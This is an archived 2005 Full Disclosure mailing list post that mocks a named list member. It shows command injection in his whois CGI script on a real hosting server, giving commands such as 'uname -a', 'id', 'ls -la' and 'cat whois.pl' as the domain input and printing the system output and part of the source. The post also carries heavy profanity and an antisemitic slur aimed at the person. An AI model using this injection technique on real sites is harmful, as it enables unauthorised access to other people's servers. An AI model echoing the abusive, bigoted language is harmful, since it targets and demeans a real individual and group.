|
Full Disclosure
mailing list archives
Fernando Gont remote command execution and big mouth vulnerability
From: Joxean Koret <joxeankoret () gmail com>
Date: Wed, 3 Aug 2005 14:04:31 +0200
SHUT THE FUCK UP!!! AND FIX YOUR FUCKING WEBSITE!!! WE ARE ALL SICK
OF YOUR BORING E-MAILS!!!! MOTHERFUCKER!
http://thor.prohosting.com/fgont/cgi-bin/whois.pl
whois for domain: uname -a
FreeBSD thor.prohosting.com 4.10-RELEASE-p3 FreeBSD 4.10-RELEASE-p3
#0: Fri Nov 5 10:49:09 MST 2004
jblack () thor prohosting com:/usr/obj/usr/src/sys/LOCAL i386
and whois for domain: id
uid=59286(u0638237) gid=1000(user) groups=1000(user)
and for ls -la
whois ls -la
total 124
dr-xr-xr-x 2 u0638237 2000 512 Dec 28 2003 .
drwxr-xr-x 6 u0638237 2000 512 Jul 21 04:35 ..
-rwxr-xr-x 1 u0638237 2000 15091 Jul 30 2003 cgi-lib.pl
-rwxr-xr-x 1 u0638237 2000 621 Jun 24 2003 cli.pl
-rwxr-xr-x 1 u0638237 2000 993 Jul 30 2003 dig.pl
-rwxr-xr-x 1 u0638237 2000 4388 Dec 28 2003 fuente.cgi
-r--r--r-- 1 u0638237 2000 552 Jun 25 2003 p1.txt
-r--r--r-- 1 u0638237 2000 549 Jul 7 2003 p1dig.txt
-r--r--r-- 1 u0638237 2000 556 Jul 7 2003 p1host.txt
-r--r--r-- 1 u0638237 2000 577 Jul 7 2003 p1ns.txt
-r-xr-xr-x 1 u0638237 2000 562 Dec 28 2003 p1whois.txt
-r--r--r-- 1 u0638237 2000 192 Jun 25 2003 p2.txt
-r--r--r-- 1 u0638237 2000 192 Jul 7 2003 p2dig.txt
-r--r--r-- 1 u0638237 2000 192 Jul 7 2003 p2host.txt
-r--r--r-- 1 u0638237 2000 192 Jul 7 2003 p2ns.txt
-rwxrwxrwx 1 u0638237 2000 192 Dec 27 2003 p2whois.txt
-rwxr-xr-x 1 u0638237 2000 10171 Dec 28 2003 whois.cgi
-rwxr-xr-x 1 u0638237 2000 842 Dec 28 2003 whois.pl
BREAKING NEWS... for registrants of domain cat whois.pl
whois cat whois.pl
#!/usr/local/bin/perl
require('cgi-lib.pl');
&ReadParse;
$p1="p1whois.txt";
$p2="p2whois.txt";
print "Content-type: text/html\r\n\r\n";
$string = $in{'direccion'};
$_ = $string;
$string=~ s/\>//g;
.....
$cmd ----->> YOU FUCKING JEW!!!!!!!!!!!
"; open(p2); while($linea=){ print "$linea"; } close(p2);
Turkey hunters, inc
"knock, knock, Neo follow the white turkey!!"
"Fernando Gont" <fernando () frh utn edu ar>
Folks,
My posts to this list have tried to show how easy it is to perform ICMP
attacks against TCP.
The attacks are blind, so the attacker does not need to be a "man in the
middle" to perform then. The typical number of packets required to perform
any of these attacks is about 16000 (in many cases, the attacker requires
fewer packets). This means that even when a 128kbps link, it will take the
attacker much less than a minute to perform them.
.....
Fernando Gont
e-mail: fernando () gont com ar || fgont () acm org
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
 By Date 
By Thread
Current thread:
- Fernando Gont remote command execution and big mouth vulnerability Joxean Koret (Aug 03)
| 
Intro
